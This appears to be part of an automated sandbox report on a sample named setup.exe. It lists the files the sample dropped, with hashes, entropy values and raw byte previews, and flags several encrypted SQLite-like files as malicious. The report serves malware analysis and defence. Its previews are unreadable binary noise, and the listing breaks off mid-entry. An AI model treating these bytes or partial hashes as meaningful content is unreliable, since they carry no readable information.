              SHA-512:CF815D0F107A31987557611ED78079362A761181C90CA7122AFA46EF160D84D8A4887B32A7DD273294634290BC0E728A02CAD4353E008D8C8B12BEF0B0C2BA8C
              Malicious:false
              Preview:.<?.`.t()...o.6@..E....n..[H :#..(....r..w.tje1...Y>|.i..q.....I...%..x..+..lC......m. r.V...j6.....M.*}..zY.......K_.x..Wk....L.... ..|e>fo,Id,.....;.!d...3C..K6 .B.:m..z!s.:...Uv.m...r?...<....&..G..(qM}U9$.......ru......`...q*}2...=..Q.[..C..m....Z+^........l.-a3................q,.BY..]..D..u.U)L...[.....ME.c.>..v.3..*.L<.E.-.k....S../...0..Qv.0.f.\5...$...N...p.N.G..hPD*{..&G..9.........l.......h!F...+.n....>...5..w,.~.y....oKK..CB....1v.j..E.]. .............7..t8...:"..q.d.]..$2...] .V...A.....|..G.....Ak.p..0.V..H..3|l.!d..A..Ij......;@<...l.F..5\I.....G..w....@.{..KJ....}....9yd..........F..K.B.....,..sU.}..k.Wu....thPL... SKh.....Iu...W$.p.'.WE.....[...#>?......Z...>.>~ ....A..I...;.f.......p....N.uDme4...n..Y.wS...f.[S.._N..!,4.b.`.mN.K.i....h.7.fY.T.l..|....(U..d.#...|U.J..YH.a^..T.t.,.T..e..H-........a..Y.\..]....X..rW<.G..q..;..MMUp.?...u=.]..o}.........^...3.i.o..R(Q.....[.). ../.4,Y.8]...8~..D......R........i.i]..6q.?
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1727
              Entropy (8bit):7.892525579566446
              Encrypted:false
              SSDEEP:48:Y9NyoXIYJFlqF4yLrbx3iB02Khx7U48Yyvm3phdD:YHywIYJrqF4MpiB02iFwe3B
              MD5:320E5747BB38AAA8A52D8C54B5EFDE09
              SHA1:FE149F28BCE60A4E2656D6F339FDF282FB7E33E7
              SHA-256:CF5464DD395FD8FA10D1AD447F3EC7FB66EED2B81C033A5A85E228BDD4FFBA5F
              SHA-512:F0A667A77D4261F17F8F505A6B9B8D3F86B2C40468C62C51ABCD20728FC845AD8AD87E420132B4E1C5600DDC29446BC45A530F8C88172D5EFBED3288F76CDDB8
              Malicious:false
              Preview:.<?.......X.[..e...........&..*./B?k..b..GU...(..GF.y.N..{.'t..'.s....I......SC.+G...lZ..R.\.....P.>.9.X...g...O...4p.nX..l.6[D.....j...D8a..\.........'}.cr V>........<...v.....c*...9.v^L..;d..Fo?X......R.........L]t....,6D.e...O.f.Y.Qd.Csy..h..&#.........a....v+.2.2..Kw%...K......Rn...w......7(a,H..{m......z.3v...&..YZ.{:..~.}.5Gl.T. .nB...w\..m.Z..=..c.f.Q.......A.bW....xJ..[k..).d....N.^e.N...9....m....[.eJ.KD/.><.....G&t*........u...N/.>|G......uCaF..V8..@52........`.!.G.....d...>..I.`."B....TW...B.#n._-.h.o.Gh....S...H.%#.B....v.._.....c....!..<..37.-u-.sk....._mL........{H....(.....".p....'....HY..|..=N.@..e..=....Ksr@..(..^UMu...=..x..C..14.;...>]...Dk.b.R....mc.*..|.d....<..O.v..F.# .B.M..J>.....>~_.(.T....U..(..y.!.R.HA.{7t...y.....3Fn%.L.*)h..!...1...>...l6..'*,.L_...e.l.o9....\....7....y.y"..y.....(...!A.).I..3<Ek[}..=.^..%.....|.&....a:.&...0..../..K.d...[y3q.:8....:..dr4r.#.\C.....F........KS..C....Q|......b.4S.Y...$&..P..3.g.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1696
              Entropy (8bit):7.885105412386851
              Encrypted:false
              SSDEEP:48:FCpO5hWI4Rr6nIkSRb2YtYF7A1vHheK+3D:pGI4R+nIkpxF7ArBi
              MD5:03CF485156E32848408852B7DB6E25CA
              SHA1:53F195E8F9FFEE422DE8D5CACB1A49A56A1024E0
              SHA-256:61EE02B22BE2BA819FD6CB445A6CF24E354AD3492B8BAAB45F43A4B17B40F809
              SHA-512:6EFD8508DD880638FE641BEC17103649387096E4EA67F5EE0084D8A1A0869E70AB1D76CFECBE60BEAF9A8E3FC07C2DE0418554EDE3513564572BE1AEE18E1F7D
              Malicious:false
              Preview:.<?...[.k.h..o..mo>l.H#4d..0..Y.x.V^..#.'...7.8G........[m..I?1U.../...gu-]p7."|..D%..u..Pz..]..(.g...o....j.R...d...y%X...*..K BD`.I ..._....H.j.../..;.^.....^ .$.m.j...... D..8...Z..D.o+....@h.,.>.5x...i..~..Y.....5....\.-.......Q.l .s.E.w..|..X..u...q..m.VI....-..5.Ka}-.J...A.d#..KD5w...Q4=.4-..s..%..>Y.5vd...^.>.&..%9..LV..*...........2.j....H.../>....g.....i...d..f`.......Mr....{Xd...K-.}0......'.y66..s........ev$.m.*M...T.6.N.....__..p.5.%..d.....z...Z8.B.....T.?.......0.".o...%.A...)..qhc..w..."g\..)L.....q.U...e.\0.Z^yW..pA.Z.t......!...TA........1....4..kd..Y........~...:]'.....>.?.R.C..fz.....i..2.)7P.....5.~.G.B...JF..0Enb.....,.x...MR`v*S..d..L......b..D.}...D.}...T..x..Q]O5.<].#w/..V*.&:.\#c.<...n.(.......b1.5.Wg..O1~......Z.@...j.1.bT.!..doR....*Brr.K......t.;'.i.h7;.B5.f..K|rziz......Q'...iY....l...;Mo.&.6....tW.d.(.m......-....I...d.!g...<>0...9.....VKo8h...k...l..{..=..... ..8M?(.1;.Qys.!.Gg....w7..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1733
              Entropy (8bit):7.885383896891195
              Encrypted:false
              SSDEEP:24:hvViHX0evpZHjQiJO9wG47TSsG91ksw+ntKkBgi1TOTPX6fC/XX0zAebA1YbD:hNSzDMiHTSpHtKklCDX6f8AM1CD
              MD5:D392081E2B3F2C5525200A8CCF0EA1AA
              SHA1:B44840E70AE79AC6C2B37B15BC29FCA371D3C571
              SHA-256:C0FC7101496BC012ED3527FC490C3442DCA9307D97D719EAF1AB1B500491FCAF
              SHA-512:68AB6B9761241D3FF4E34CFC84D29E702C6EC74757B5D4575230958CE5AFCF0E97CA1837051042CBFF7F300954FEE1773226170C724841AD02AF49916E8EFAD4
              Malicious:false
              Preview:.<?.......,..p.B;.J-.+..hU..j.I..;."..K.A......f.a...._(b......^y.+..^s......|.....!..L.*.."...7..gT..|.S.'..$V...z}x.E.Rn.S..4........q..-G...2..w8l..[...<T...E.T. ..)^.`.$=4yf....?..(..dG.tB.M..D..N~./WY..+|.i........A.V.~.W.#.8..>?E.$c.!m...h..-.c..{..I...E`R<...bSG.....4..uJ...] X..] J&.|"C.uO!..7....S..vT...4W......x.5...../.Ra...t.S..........._...u,.pQ...F V......{1tc{.T.2..`.<W+ldr.A.kh:..<1.0._.x....tPB).h...0C.G,...Z..ZH....v.^fT.......z.YY.Q.[.2..,.....iz.f..?.Js.Z......Ff.a...6.../.4._..D...!.%.../Z......O.@..p....8....-*...<..}....>Xc)Y|..O.[.f!,..\#.&1=t..[...#+..%.....}.S7u/...k..p...3^h.B=.w ].Q..f..'...9f...k.G.....h.R..W...Z....}_Y.......q.7.d9Mg..........1[..>.c.. ..t.........Y0m.k.Z...5.-.Z..9 a......w..X..-..=.$ND...V.!C.!^7.V..5..B.r.('...Q?T....K.s.=..pC.k6r../...=.7.....Q..L.jA_.D51..g?.iI.|%.s..N.P9lO1p....su....V.Qd$.!...c........9rf0....}z:.t.u.g...nR=.....~..`;,..v.a.9...g../.L.}..>....1&.LX.......F...6....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1696
              Entropy (8bit):7.8693314378129156
              Encrypted:false
              SSDEEP:24:GpYU8ROdGBeyIwSlhBJFQ1Zc7kSlVoNZYnA6itJE81DnPnJblGUHssYkqRy1tbD:nUKOdiFIw0xQnBeVoXhF1Dx8UwkhD
              MD5:6B8CC99A697139A3836DB03370183903
              SHA1:1E6077879189852DDDFC0D642CD54D26720C4B30
              SHA-256:C1713E73F896F51C20BF95FA4400E1221B9D31C5A346AA586E43BAA7358D07EB
              SHA-512:F05E679AEFC707BACED0B919E0BFF34101B767998626D41EB1A73ADB8A19715B2AF599C703549EB52FDCB7EC00C5D49A940607ADDC11FCCB2DA2E85A6E5ACBC2
              Malicious:false
              Preview:.<?."6|.8.8V}...YW...1@x ).o......V..7.d..Y./w%^O.7"....$F.".g.....@...!....;....x...5...L..c`.+..Md....'5......F..B.0..yz....r'_+/+..ZB.}r.!Ox...(>xm...:.m.....}..`...B..C.......| ..zlih2(...SFVDY......!.#gN..VE...j......?x..W.2`..z...K...R.....A5.wNK..?.Wz..]t..iV.%15..f..e..9'+tL..l.2.3:...).ci.@....r.*%.L=b#.-..h.2"S.S..>....2...}.3...PG...Tt...........Al..\.j+......./D.../....]7...mG."...H.3.9...j..C..^.....B;..7.YD...P;.)...k..R..T.....b.cd.......r.R)/x.+.>b..e#b..CH.9.V..=.ij.c..7......9X$..8T../@J....V.b'W..T..qo...T...:..n...=8&....hM.....(.+.|.MV.N.,....*E...e.@.qv... z...7.._...m.d.].......z....O"......'.T......E....0.,.m......'.>..Dqk....1..@ov.....D......#..v..D.8Z.HC...x*..h...J.....X.......l-.Fr.;..d.t=g...0....!.........M.J.[?....4./.y.....Xx..Y.Y%..C..k&.u..WH...9....=-......h..<.yQ."je..mW".T.'...N...Ho.Y.h.!.f6....-....H... w!.*. 8.....T.Z.y...m>.`..P.....u;.z...%....04U.%.q..~...8...."a..k....?.Ly..M.UM.:..o..C..D<.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1733
              Entropy (8bit):7.878704094232209
              Encrypted:false
              SSDEEP:48:03R3XJjyiePfoxlKKZS65kZfLZaL81e49D:0BpjybfoxlnZSvZ1qaF
              MD5:C958D7A55EED79E1CB461785B3E8BFEF
              SHA1:EE5E748D98315147A94A2A38C88810629B06CA22
              SHA-256:731764B3FD3049CC885CF9BE54367C264FDC872103FD8B685C3452D85100890F
              SHA-512:71CCCFFEC7CAA6741EDF801E348382F148C57590D1B39B26CEFF476CB499002A890A4B56F6A28476F0F3D14A11B5E830CBFB5981696614A16B1C7542C4182010
              Malicious:false
              Preview:.<?\....AhtaC...p.H...e41G".......tzS{tz.u.}x-..~..Wb{y..n....3.Y........z..4..1....[.s....*..{...w...IGg....fh.(.xt...S.,M...+.R.a5c..[..}u..'..5.?1+..?b.......T.B...6OY......A[...2XX.t...MtF.\+.ol..fk....;.0[.\..}..T].G.k2P4s.(.Vl...R;[.M.$.qK {.Le.......3..z.u...R...........w....-q..TBg..f$..P7..N.............1:.q..G..6......Z.k....&..^Um7{...#jW..7....2.q_.J+\.......s.*....K......Y.....>_....%..d31\.y...a&/:.`.U\;+.@.<..{ .G.....;Q..I2.W..>.1.......-....S.....c.p.W........Y..".hI`}.V.Wl....n........P....X..9.....14K.E91aH...3h..%......?.w.#O......Q..{..@.h.....-zT.B.....G.L.......skC...^Nt.q....g.s......%.r9hN.....t....%.+...y$k."U..].DP=..@..'2X.\F..b..-.z....r.,.c.p..GO.Ho.....QBF.jw..GAE:..Vb..m0...2.`l....g.h...I?..GS......1C.....2(...........'[...C.....k.J..K.JJH$.......V..S$ie..K(.{T.J.......N..I.X9.c..Us...c...p..7Q.f....`c.4s..c+.O..."..f...FG.N.9j9$...I..n..z.o.+......(...L5[..*...r..[...:._....w-rU}..{84C.F.3..:>
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1714
              Entropy (8bit):7.890168994455557
              Encrypted:false
              SSDEEP:48:RX5KxOZgOyz7KOLrk3ADQP+Tyv2Xb9qHKDuCD:R4xogOguQkwUP+TnrAHe7
              MD5:F32C460D29E8C8BA2C7D480657D975C6
              SHA1:2C74021D5B5EC43EF029E28A0BAAEEB24A580F25
              SHA-256:3388E3270B471F7452288482C650B2FF704230A92382729732F54F961633BF60
              SHA-512:032C203FAE6B18BDC3707E0853CCE9A1CF8FE7429B460F9EAFCDA7CE85CFA6A05F263893DB6BF9A28278E1C8517E370B614B7CF2CC6E9952BC9E60432C49E459
              Malicious:false
              Preview:.<?...4...cVCm....M.................]....S/a..:..>f.CK...m..v.....)f.p..*.oZ..y./..w)..Z...~.w.T..M.@.5.sB.v...S^..r..A.r..m.P../z...G... c..`[...k..T..=.`.........X.!}.^*|...<1q.<.A...."S....7....Q].R..ss.$7..L..9.'....w..Vp_5...[.....yQ.9.....\.4...5.*>..&-...r....Q....3...I.&..7..n......v.o=.7..U..zC......W.)O..HA<4..........er.D.N....3c.r.4\...........#...z?....VH.D0].C.ua......Q};.\..d..Z[......n..2;.U..l ..RP;..F.v..v..:,....{-..,7Bn..:g..f(S..m..w.R.m.^ "......j....d..Yv.s...........G.S.{..O...`...>.!.Q.~=....e.0K.@._O..._..d...........'..1..H.Z...&@.w.i+..qo0A....~..b/J..L!.fU.c..n.`.h...Ok|k..*c....%......~..S=...R../.......K..-..?..(..f..%N.O....*0#,&d*...E.R/.Ww.k..YR c._e..X9..h~d....x.z.)9..Cs.a?.>H......~-G|.M....\...'..>...>A....x...x.T..Q..}..Oo\.`...]hyZ....z'1[......i...].......$0.}m...@.zhy...~.E)}....<3?4.......{{...C.sk.~...d.m....c..{.k...bP!...k.w.$%.U.m.s..C...`.......u..."Ov..z.^.L.....\..j...%.u.mr.V_...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1751
              Entropy (8bit):7.895968354051015
              Encrypted:false
              SSDEEP:24:NcINcLZPtCJEyfmIsUbvksBpozSmGRGfGoMitwnFTSgwIyY/w7hdjbD:NcINUtCC0mIsiTjIuoMitwndSU/eZD
              MD5:539DE7B404A44CDA638E395DC2DB7814
              SHA1:278BA026CC88741D655E86A5C1BBEC3ED8A6A829
              SHA-256:2E1E5BEE4EF889E8413A221885810A2718D614CD67AA0EB176E5C3AC3A008E1F
              SHA-512:F1B336071CC6D7DA6000CE6E4AFD217BF79AC9C69A410F07E715BCE0763B8451B0BB7132C86C1D974A92698F31E4350564C2BF1E772ABE6388FA406C362DCC7A
              Malicious:false
              Preview:.<?.....[..6*x.\.(...]F..9]...d.Gf..9....a..2..u.WAH.|..N....Zy..|.Q;.gp|2..Q..:.._...Q.......L.n...b...>g.M....^Tj..|..im..c;...qL..e..NIz....!..H..'....../G../....c..Sp...1X3:X>.WN.[......?.$......&..>..Q.ni`..X.0.T.y..,...VG.@.*..........hsv..q{..K..?L.... .br.sB...z.u.r.Tu..:..T...l.l.f<.....a"..|...l-u...I..X......V3+..5.r.`.K...+0.K......t..._.}.-.a..%.....?..Q_y2oU7r.p.'....q.v..:.5......C..g2.p..h......7r...........g&..._,V....%X.H.M.d..N...)y.~V."...3t.>..u~..n.M6&....;..:..E.0..'.........Ccg..p.....9_.[.....9........@y.j\..s=......%......t..y...5..2........7..:b)...H..d.7f..V...]^&y..R .`.|}G..dGv..@$.j..q.Qs.......^6.d.......znS.O...M...L.......w..\.Q....;..b.Nl....]..IE....h.Jh..B.=.....D=m0XV. .t.w..c.."Vq.a......W..[m./rN. .. .Y!U.u.@....53.......(.h....a?.....z~}_...A:.z..W......f....Wv.C.b.."?j..)..(.L.2..T7k..h.. .3..H8....S]........3.....k....K.A.'m..$'Q..-RK../.@...knG...M..h..#....\...&B.H....e[5.g{K...*.8|T.&.X|!.7.I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1583
              Entropy (8bit):7.876428326095186
              Encrypted:false
              SSDEEP:48:smz8pmu3AO44VGIIFip0MiI2ASnv1COJfM4PVsAsD:hYgn34VGhoFiI2d144PuAI
              MD5:E69025A679AB0886362734187F3428CF
              SHA1:24772ADEA393F52DABFADA26AE98334CE07878F3
              SHA-256:0D0CBA4FA2121A90187ED5B71A9339E5CB56F5CDCD0EC449C3D791FE4F7F5666
              SHA-512:872B15784CF71F46B0B518EE4E103D632DC6EAF9725F27C4C9CA22A739C65BDF6FC79810698FA0E7FC9AF1E0A5B3DC8415738BFF6F544568702C6AEE6730A394
              Malicious:false
              Preview:<?xml@C%mG.[......sE.....m..@n.. ....?.A...B.V...X(&. ..A.}............^-.l/..}r..0.P4..l ..N...P`.];LV.^.....[%......,...@...V:...u.4$.......).....4"....[.Z..q.$A.\...../X..KO.Z.....S......&Kt1.....}W_.C.a.q.Y.Ex.Y..J.....&x.....o...$...%o>.v.QG.l...f.iY.e].u.'B.Q....;(c.A..@.c...F.M]"....2...S...kq.`.....ux...V.....G%D.....w..%Xm........Ik..wF$T7...Tb..R.C.Xe.F..7.....B.,Tc.......H.m..q.?T.....z.x.........:.<WP.i;...5.m. ...l..F...L.........!..-1.w/.z./..Uu..}.T+..z..`...J...9..0l..-...{..D.l...6..>....`.....:PvW;...|ow..&.Ll6...ht$7J.8.=.x&..U.:.=..{@9..7....dfn0:Dx.........U.:.E.-..Ip.}...rS.BPx.n..0..`*.g.a...n.g..r.Y.eo..e.7[........ol...,>....K.=....F.?........U.."!m...U.......D..+k..w.{.....~.3.C..k./^d...F...zO.V.U..-.4"........,.....X..H*......I.r.,...[.%dC.....,.9....5r...ogH.N].<./..[R..G&.O..QD..g..Q.....U.f...k...r~.H.I...}...{..8n`..e..G.=f-*...xJ.....UB..../4.^eQ......}..9......IF.......J...@.....ks..<...*
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1098
              Entropy (8bit):7.803923103716841
              Encrypted:false
              SSDEEP:24:sjQNS5bk9Iu7DQFDI9w/0oe0u3ijOFAFbD:sjQNS5bQI+DQrtNQED
              MD5:80473F0194DF16A297E9545E8C49C90B
              SHA1:64F24F390A319F12522884603456A4A492DC2CB7
              SHA-256:E25071632D357B548F43324082545F7A4186CF3946B1BEC35B3EAD098CC946E3
              SHA-512:B922E273272CABE3E61EC1BAAFB6D44FA19A9F2A695E11B114E0346CFBD701453029608A7EFB732F77B202A4C4C62FCB3FA38B8CC671CD00D16A365DA62D3AD8
              Malicious:false
              Preview:3.7.4......g#&o$......j9$.2.%...cC.W.8...f.h.i.!`.........1.Kw.=0].....c...$...Qd........;"..^..i...>.jE..7./.y...m......%....M..|.9....H...q<zW[.tf.......2.......).....)..........a).e....Fp`....`..A..'..../.!.............X..h..YB......<!..l.vnm..:.....O-...V<.$..3B...&v..4c....P...........|b.z..*f.4E...P.....f0`G...!..*hC.........|...Fe..+...b.lZ....8.{..\-..Q../.....?EW5Z.UY...7..a......".....E.M............:h(4.9.l6.p.&[.....?......|...M.....(....:G........0E.......F.@Z......#..k..Tl.$.-.....M."...+E.....U.L...)6.........E.n.1._;..8..4r.....M.....eW>G..{..e...$.4..:2...u(..>y........"\..,..{O..}......w.yZ..go.O.I...~.!........u..I....8.a.Pg..e-....k.Z..|..e"....GO...`...j...+.z...Ss...@..A.............`..i).....nt..$..=..&......q1iE...qI.._......:....P..0.......+.DdNK?..].B.u.d....O..........[7v4O....QD...*....<k...Z.G.3...l...G.\.,....9.WtI.O.Y..-......z.........Wt+..L...u.3.De.M..H?u...I]...3Tx.q....).?.|......`...z..A...L...P.....p.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992460537129121
              Encrypted:true
              SSDEEP:384:QQegQNvQ7yZDcxBa3IFe90Xb4NXqAALp+pTh4rhSb16a8QRG6b1ZEwmE:QQegCls+Iw0KXqAALp+f4rha8CGgZEzE
              MD5:353362F1C58CC701573E581A64D436FB
              SHA1:8D14F97095527A5F1F2B4B10584A2C8B03FAC49A
              SHA-256:AA00D937E20F49D9189B498507F55918E3435BC5B436F92735CD9A9E3B3377DB
              SHA-512:CAE21C241717F571E8CD578B498C0E6B7B3798B90544678D61B1FF07BC795F9C79E2639F6954AB5B6D2CD859FA7B3E6911A6FBE34D97F76B0A4C685C7D858E03
              Malicious:true
              Preview:SQLitl...Du.r....v.jt...ZGn..HP.2D.Z....m.s.I.[....#@<t...[.CA.Z.p~4W\..x.&..<C.......y@.".g..U.O].Wi. f.x..H.=......v*.....?......a.."..s.....i.R.&MWV.Wp.C.F...:.]...'-"...#gsSK....c.'pW.p......fy....H........Ci.".......sA....N>...-..._[0.......og...&....0..'.y.........}.F....C9.!.........L..d..L..[.......t...B...k.,.?..{..L....&..Z@W.1.n.(.3.....t..W.h0.U..f%?z..i..W....t.....,.W....Y.Bp.!j6+D...p...C=.lT&........3.o.......:..I.'..K.....5.N.o.o..)eP.1*.*3...n...*.?."............~...8u.1..V...9........|.v.^.....^.Y.......4VaX$t..G^4.^.........{.BP\..../.q..y0ngfu{.[.NJ....>..VH.W..>E...5..a.HH.,.V5..E.&....*.....%.*..NI.l..o.......:.h.%.....M*1.P.LT..DN0s.......k. .....g.a.1.....U..P..Ly|.....C..\1~3`.].d..u.H.*.S..C..iP...^..J....|.w.(8s.fM......UL~I=..(..HCm......:...1.....z. ....{..5...GG..5.7...k~...ed.c..N...I.9s.N'i......1.>...D...q....."s).p.. 1..|on'.`8....D...C..<-.......<0^.&.....t.7....)&.J../...[M..../.WV.........f.j.O.cM.[
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992220235076175
              Encrypted:true
              SSDEEP:768:slhof4+5dQYSCHve8TPtNd4pPf9dIIO8/Vf9z0xVoOV:whEfdxSMeu3SPldFV/Vf9z+
              MD5:86FF608806B6641DD0FFA9E832C4E2E3
              SHA1:F045A36DB9FA27D2A3F9720F8E90614CC6CE17E0
              SHA-256:951DF22C00DFAFCC15D3915F2BD397E11D1061F2AA5C8B4899D679D38C31AC3F
              SHA-512:5FDA40298828221C43396A590CA4AD29934695BCF22ED8F87B6AAAC2B7B19508801F75A7745B76AF7567657797F677CAA1ACA8AC8484AECCB1C1D9CA24D15DFD
              Malicious:true
              Preview:SQLit.d.^..*......u..z.E.......I...h.q@......h|..O..+..6<.y.:......M....%:u..tSu...R.l.*..&K.........N.d ..X*bt..A.....y..8..x......{...........Vy.C...%N.t.oT..=....>....a&Qt.q..}7.\.t\...L....&.6.._ot.4.b..%v.....$Q...g..&..gB5...#..Y.%....l..M7.........}yq.O:r.lf.p...]%|-..$...6.1.1..j...q.^x.w#..T...2.. ;.!P......F.H.f..,..s.P2.c...2.S...{..0.k..H..`.}U9..w...zV...........b+..w..O.2.e......TX|.h..P...\......cc.P.gx....$.....Un......|lZ$#.m. %.+..m.I^.U}..8.Of....G*......o....'.7M..H<lv.Oe`...l1..9M.M^.b.....&..d;......._......+..L....;.G....SP...lVdxK.Qm.=.@..J>./..~.0.z.^r..F ..`l..+a"..|.....).xaM....j./...M,aZ..E......c.f.C..+.O}.4../#..qn.....KK..D..T+...#>.7.W.].\{.8.hvm..P.j.\..f...~.7lCd.3.&...&......|..a.......k...M.c.*o.~M./!N+Te1...L.G@..1....E...j...Q..\.....Y.....t.j.)q..1...."t.;...D.f.]..r..6R...e..y..p...D>:.W.h.4..f/..s.......e......]..\..M..E.NXs..&.)Q.xn....y.Q.?.}.M5/4..Xu.XS^e...fR.^a..D...Ml.t.XX....@1.Mmf.3.3...._.v.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992899696038577
              Encrypted:true
              SSDEEP:384:VfvEWIr2Ss2Z9IecevLATrumOA9Oak0c970P9s5RV8tyxT2np+4CNti5:VfvEMUZm9umOAQ0I70W5RV8tjpoNu
              MD5:53E6AF0E5342BD1DF7181906D4153EC0
              SHA1:A866A2358BA7854B983B1B9FDB71AF05E5D6D139
              SHA-256:76E85621EC223D6C38DDB9D4F98DB7D6A883979A22C958F4DCAC3BF631E6DDF8
              SHA-512:EBB081BE5336D1984D0E4BC2598BAE953E0CF1342389F6D937909748B0E317AA617A965BD4B3F2C35E8EEFF0CEA4048AD4A73DF8061BEBF19B6E05CCF646185D
              Malicious:true
              Preview:SQLit.d.1./...~..:w.zlSR....(...`...[... 4..R.-....H.)(..}5.....]......l.g...N...9..A$....u(....1.=;#.e..,/.'...n..nOy.......5h..r}.. .|...|.....?D....7'..4...8....RPN..i..;.MZ&...).N.h..7[..:u..B.3.'..s.?.........'@....G.KC..|.N.B;..y..~....3.35W.....Nea6U..ZBg.#o.A...[e.f.._:A.....0@2..d>.8..&.....:.Z....0...vx....y....>./}4{ .../+.m.`../)f..2.......<..g&..=#&&.D.VdP........>......:t...0S.|..4>.:.....G.=..Y...Oz.M$."IOz....i.s....C>..S.-.}_m.=........H.3M..........C..x..n.........#....!../.5J.......(M..].f..[o.V.I.).L.9t....vNP..<..}.x..YNeG....]....c.^?.(..$..+Un..b..U..C .......!m...T...J..n...v@.B0..... .#.jtm..s.R.|....s...|.....2QZ5..Ym.5 . ..@Ty..7.7...]....a.?.]n...L.7V.......$.^..g.R..M;.<;..p..l9I....gu-h.W... ..\.>J.h....r..n5......w.e.j..G....sfm;./.[...XM.gT2...i~. pp.1...tbD>...mF.?...L(.:.WEF...RZ...T2.....Xn<...d.....K.....s.....Y..).]s,&a..g.R&o7A.Ic.x.uRa..A.:UP....f,..z..............[..{.(Y.uu.0.7Y.U...G.X..I..d..(
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992196420352433
              Encrypted:true
              SSDEEP:384:kFpCxzPSQ/cwB+0MdV0ZG4O1xIsIQsi14wiUUB5kMzkLWc5EocwKCt9NMByHLtWL:kbGSQ/fB8bmsbL/w2eKEojhfMByHL3Ba
              MD5:8022EA4B8CAF102FE0518102947044C6
              SHA1:8CAF531DBFA14828822CA003F2294ED2BC116A66
              SHA-256:A2AE1858AECA508FC9D5F8064CB38C92CC8DA2BC8E97A5D0193290DFA4757A09
              SHA-512:0D55E5B7FEAB5BDF3F9DFEA5DDB20C7706E1CCD163E279DB3F19945EF4DDEE7B1529DC575E0751AB50472C7763CC74EAF191E7F0CB2EC80934E234495F19ADAA
              Malicious:true
              Preview:SQLit..u..=.s...u..Yg.....N.w.......B..)..q'..U.I......m.e.=\+....\..b<..W.c,>.j.._...E.....8..wz....9....c...'P@. +._.......d1.)...o../.....&.S...u..Nx........G...<.? .........h...Q.J..q.4.r.....:.x.e].z...F..z{..Y..&...\.p|...7.mL.....d.7m....Z... .u.Q..m..4AWZy. ~....:.SDH..~..l.1.].....j.oC..4..S.{...&...../...k.3...i..=..E?....O....$f..N...G...m......6u:v.)......r...jX.K.+kn!6t....q%..._..$...Bm.b...../....N....}.n.....~.5.=.b..YC....d.=....O...|.T2.o.*zxxa&Y....p.1.......i&..p/......1m.o...B....V..^..n...&gp2o4...wqIR.Ns..0. q~.^...$$+0.....E.V0m.!.:........I&.l1']a}.#@...oj...7X.coN.|..x...*....t..3.jt!.f..|....\...M".w...".[@....60.x...`...7..w....$.,.sn....hT..o.?....c0...2......o.(y.i.}B.P.{$..jvY..qsd....0..j....Ha&..PK.&._f.Z..{...-R#[..w.v..{VG..{&..%...P.bN...R.4..12s....u.K..4...._.3?i(...gOe;R.Sw.O.a9...E#..@T>..R%.bg.M..Y..r........%.5.mU.{....&..yV....y-.).......z......F{.i1.!`Z..\..;..H_..a.. ..9
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.0427144883286887
              Encrypted:false
              SSDEEP:96:IxfuPp3w64Uw14r0q8n+vVYwC8WKAZaefXrqo9SdOZbgZUDjtO5C2jm:Ixeg64h1G08VY4VezqL08qDjtO
              MD5:51790BE2D910F58FE62397DF123781AC
              SHA1:E6FD4CA1D367E146A34271AD6CB502FCC64E26B4
              SHA-256:752B165422D6FF18EC59E1ABCDD99643752393A17B3594FDC8175DF747A8DFCC
              SHA-512:54866A0D32F8D864C9E23370058420105D03DAE17C618531CD114054CE844BC41FBD282312C04C3E2E691AB11C7645D5F6F8C9511B33FD22A4B1851ADE1118B3
              Malicious:false
              Preview:EBFGO..r.e.n...b.-.E..S.,Z|.e..i...D.|G.....^..X?..+E=.l".)W..!.p.j....]......g.........<./:.5.............o..>...........y.D.*)~..D.04..p..<S.R..`...4.....j..V.....p..6=...]|...a/.-yr..?s..#..'..:..z1#R.0.L.].....H.G..\.FA.^5W.U`..xg..0".4}X&...f$..)........N".A...&."...Y.Z..8f..p.".ih..!Tw%.>S..1G...n.z..{."Do........5>.?.._Gj..dc........:E..E.V1.m.. ...tm..Z....C.M...m...Jo...T2.J..?MC.uJ>SS/..L(|......_.r,....Kn.Wl.).......Zw.S.T.D.xY\.F....RA....\|.....o.:eF.4... N vi........./>..3.H.....<.i...F........\xK.k.l.....3.o...........hE(.~....%....*..........I..........(.\*N...'..'.\r...B.*.....e.'.+...Yg......h..BgbC.6...-.".X[X...M+...K..0v7/..]d7,T3.|.].IMkR.y.......>.e........1NWn!.3T...Cy.`..n.m+%m...9A....w,...RD...x..).....i.."...Tt...6...BA..Q..w..k.K...m....7H...Bzd(...|..<C+...p.z8.o."H.!..<..S0......q...C.S..9..NW.@b...........@\.v]..V.E..~.q*p7..1|..jY..i.K.}..k..<.Q..&'...r......8.c:^.J...^...8..L...p...0...\..+..ZJ.C+].4O...!.sp......A_..k.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.2784425356872915
              Encrypted:false
              SSDEEP:192:Tw0pZw+nbtKCYEh6QDpXi7Q12NE2/DlGafa3648:fpDnZKCYW+7lO58
              MD5:14031781EA3569882A1C6F6A7AECD665
              SHA1:C6B9A600CD790B7729CD787B2F598621739693F5
              SHA-256:496A4FF2AE643A6735ED2DCA3742AC3D60DD4416D7D205087DCD3A096F131F1A
